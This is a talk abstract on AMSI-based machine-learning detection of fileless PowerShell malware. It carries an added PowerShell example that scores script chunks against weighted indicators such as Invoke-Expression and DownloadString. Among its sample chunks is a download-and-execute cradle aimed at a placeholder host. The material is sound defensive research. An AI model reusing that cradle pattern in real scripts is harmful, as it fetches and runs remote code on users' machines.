Liam Bressler

SparkCognition

PowerShell Malware Detection using AMSI

Machine learning techniques have revolutionized the area of file-based malware detection, as evidenced by some excellent talks delivered in the last few years. However, fileless attacks present a much different problem for these traditional techniques, and there has been a lack of research in this area of rising importance. This talk will propose new approaches to solving this difficult problem.
With Windows 10, Microsoft has introduced the Windows Antimalware Scan Interface (AMSI) to its malware-blocking capabilities. In the presenter’s opinion, this service is underutilized among antivirus programs. The interface’s ability to view as well as deobfuscate all manner of scripts (PowerShell, VBScript, etc.) makes it a powerful tool for extracting script code for analysis. However, AMSI does not output the whole script at once, which frustrates current malware detection machine learning approaches.
There are, however, ways to arrive at a reasonable solution for script detection. Scripts (PowerShell in particular) are often easier to parse than executables (the PowerShell SDK even ships a Parser class), so script machine-learning models can be built on very clean features. In addition, each AMSI chunk can be given a “malicious score”; when the running score crosses a chosen threshold, the script is stopped. Experiments show that this technique has surprisingly high efficacy without alerting falsely too often.
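As an added illustration (not code from the talk or from SparkCognition), the following PowerShell sketches the chunk-scoring idea: each chunk is parsed with the SDK Parser class, a few AST-derived features are weighted, and a running total stops the script once it crosses a threshold. The feature weights, the threshold, and the sample chunks are all constructed assumptions for demonstration; a real model would learn its weights from labelled data.

```powershell
# Added example: score AMSI-style script chunks using the PowerShell SDK Parser.
using namespace System.Management.Automation.Language

# Hypothetical feature weights and threshold (assumptions, not values from the talk).
$Weights = @{
    'Invoke-Expression' = 3
    'iex'               = 3   # alias of Invoke-Expression resolves to a different name
    'DownloadString'    = 3
    'FromBase64String'  = 2
    'Add-Type'          = 1
}
$Threshold = 5

function Get-ChunkScore {
    param([string]$Chunk)
    $tokens = $null; $errors = $null
    # Parse the chunk into an AST; parse errors do not abort scoring.
    $ast = [Parser]::ParseInput($Chunk, [ref]$tokens, [ref]$errors)
    $score = 0
    # Feature 1: names of commands invoked anywhere in the chunk.
    foreach ($cmd in $ast.FindAll({ $args[0] -is [CommandAst] }, $true)) {
        $name = $cmd.GetCommandName()
        if ($name -and $Weights.ContainsKey($name)) { $score += $Weights[$name] }
    }
    # Feature 2: method calls such as $obj.DownloadString(...) or [Convert]::FromBase64String(...).
    foreach ($m in $ast.FindAll({ $args[0] -is [InvokeMemberExpressionAst] }, $true)) {
        $member = $m.Member.Extent.Text
        if ($Weights.ContainsKey($member)) { $score += $Weights[$member] }
    }
    return $score
}

# Constructed sample chunks standing in for what AMSI hands over piece by piece.
$chunks = @(
    'Write-Host "hello"',
    '$c = New-Object Net.WebClient; $s = $c.DownloadString("http://example.invalid/x")',
    'Invoke-Expression $s'
)

$total = 0
foreach ($chunk in $chunks) {
    $total += Get-ChunkScore $chunk
    Write-Host ("chunk score so far: {0}" -f $total)
    if ($total -ge $Threshold) {
        Write-Host "Threshold reached; script would be stopped here."
        break
    }
}
```

With the constructed weights the first chunk scores 0, the second 3, and the third pushes the total to 6, so execution is halted before the third chunk runs.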